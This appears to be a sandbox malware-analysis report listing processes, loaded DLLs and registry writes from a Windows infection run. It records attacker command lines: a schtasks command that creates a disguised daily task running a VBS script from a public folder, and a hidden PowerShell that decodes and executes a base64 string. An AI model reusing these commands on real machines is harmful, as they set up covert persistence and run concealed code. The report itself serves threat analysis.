c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\rpcrtremote.dll
c:\windows\microsoft.net\framework64\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll

PID
1452
CMD
"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 13 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
2980
CMD
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\WindowsIndexingService.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2304
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( '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' ) );iex $a;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
3138
Read events
2781
Write events
355
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2460
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPDaysSinceLastAutoMigration
3
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchLowDateTime
3808804944
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchHighDateTime
30768811
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
4109030569
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30768811
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007D000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{2087FE65-EA9F-11E9-9008-5254004AAD21}
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
56446FE3AB7ED501
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
ECDC6FE3AB7ED501
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
4
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E000E002700DF03
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
4
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
BackupDefaultSearchScope
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
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
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
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
ChangeNotice
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A35B273C8C248C4AA9ED7E1D9A9C23410000000002000000000010660000000100002000000034CF947B4AF880CC1F9B94FAB99B8E02DD47FE20A41780522FFA99798179E002000000000E8000000002000020000000EBE4BDA0BB9243BD1D14B66CC88B92E9272F63090E91F1E02FC7B8640B2E256A1000000090E4F1244F9F25412B0A211884E8CA7C40000000F49D361983FBE7E4115B386A1A920B4E00A15261286DD1C9704CA2542A8A7066E4B4FC407EA8B381335C979BAB330295BDFFDF980BB18965DB22BF4E9F8C4763
1952
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
5
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E000E002E00F600
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
5
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
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
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
40F46DB9BC7ED501
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
4126530569
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30768811
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionLow
395188360
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionHigh
268435456
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListLastUpdateTime
3670862
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VendorId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DeviceId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
SubSysId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Revision
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionHigh
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionLow
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DXFeatureLevel
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VendorId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DeviceId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-SubSysId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-Revision
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionHigh
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionLow
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DXFeatureLevel
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionLowPart
2
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionHighPart
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
1077182848
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30768862
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionHigh
268435456
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionLow
395188360
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames
it-IT
it-IT.1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DomainSuggestion
NextUpdateDate
277395453
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarText
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarOKText
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarCancelText
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPMSNintervalInDays
20
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPRestoreBarLimit
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPOnlinePortalVer
3
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NextNTPConfigUpdateDate
277444043
2944
IEXPLORE.EXE
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007E000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2944
IEXPLORE.EXE
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2944
IEXPLORE.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
Blob
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
2944
IEXPLORE.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
Blob
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
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
138516398
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30768812
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@C:\Windows\system32\miguiresource.dll,-202
Schedule computer tasks to run automatically.
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@C:\Windows\system32\miguiresource.dll,-203
Microsoft Corporation (c)
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@C:\Windows\system32\miguiresource.dll,-104
1.0
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@mmcbase.dll,-14008
Folder
2360
mmc.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MMC\SnapIns\FX:{c7b8fb06-bfe1-4c2e-9217-7a69a95bbac4}
HelpTopic
C:\Windows\Help\taskscheduler.chm
2360
mmc.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MMC\SnapIns\FX:{c7b8fb06-bfe1-4c2e-9217-7a69a95bbac4}
LinkedHelpTopics
C:\Windows\Help\taskscheduler.chm
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2744
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2980
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2980
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2980
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2980
WScript.exe
write
